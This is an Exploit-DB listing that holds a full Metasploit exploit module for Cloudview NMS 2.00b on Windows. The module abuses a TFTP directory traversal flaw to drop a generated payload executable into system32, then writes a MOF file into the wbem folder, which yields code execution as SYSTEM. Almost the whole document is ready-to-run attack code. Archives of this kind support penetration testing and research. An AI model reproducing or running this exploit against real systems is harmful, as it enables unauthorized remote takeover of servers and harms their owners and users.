Cloudview NMS 2.00b - Writable Directory Traversal Execution (Metasploit)

EDB-ID: 42725
Author: James Fitts
Published: 2017-09-14
CVE: N/A
Type: Remote
Platform: Windows
Aliases: N/A
Advisory/Source: N/A
Tags: Metasploit Framework
Vulnerable App: N/A

  
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Rex::Proto::TFTP
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec

def initialize(info={})
super(update_info(info,
'Name' => "Cloudview NMS 2.00b Writable Directory Traversal Execution",
'Description' => %q{
This module exploits a vulnerability found in Cloudview NMS server. The
software contains a directory traversal vulnerability that allows a remote
attacker to write arbitrary file to the file system, which results in
code execution under the context 'SYSTEM'.
},
'License' => MSF_LICENSE,
'Author' => [ 'james fitts' ],
'References' =>
[
['URL', '0day']
],
'Payload' =>
{
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'ExitFunction' => "none"
},
'Platform' => 'win',
'Targets' =>
[
[ ' Cloudview NMS 2.00b on Windows', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Oct 13 2014",
'DefaultTarget' => 0))

register_options([
OptInt.new('DEPTH', [ false, "Levels to reach base directory", 5 ]),
OptAddress.new('RHOST', [ true, "The remote TFTP server address" ]),
OptPort.new('RPORT', [ true, "The remote TFTP server port", 69 ])
], self.class)
end

def upload(filename, data)
tftp_client = Rex::Proto::TFTP::Client.new(
"LocalHost" => "0.0.0.0",
"LocalPort" => 1025 + rand(0xffff-1025),
"PeerHost" => datastore['RHOST'],
"PeerPort" => datastore['RPORT'],
"LocalFile" => "DATA:#{data}",
"RemoteFile" => filename,
"Mode" => "octet",
"Context" => {'Msf' => self.framework, "MsfExploit" => self },
"Action" => :upload
)

ret = tftp_client.send_write_request { |msg| print_status(msg) }
while not tftp_client.complete
select(nil, nil, nil, 1)
tftp_client.stop
end
end

def exploit
peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"

exe_name = rand_text_alpha(rand(10)+5) + '.exe'
exe = generate_payload_exe
mof_name = rand_text_alpha(rand(10)+5) + '.mof'
mof = generate_mof(mof_name, exe_name)

depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
levels = "../" * depth

print_status("#{peer} - Uploading executable (#{exe.length.to_s} bytes)")
upload("#{levels}WINDOWS\\system32\\#{exe_name}", exe)

select(nil, nil, nil, 1)

print_status("#{peer} - Uploading .mof...")
upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
end
end

Related Posts

Comments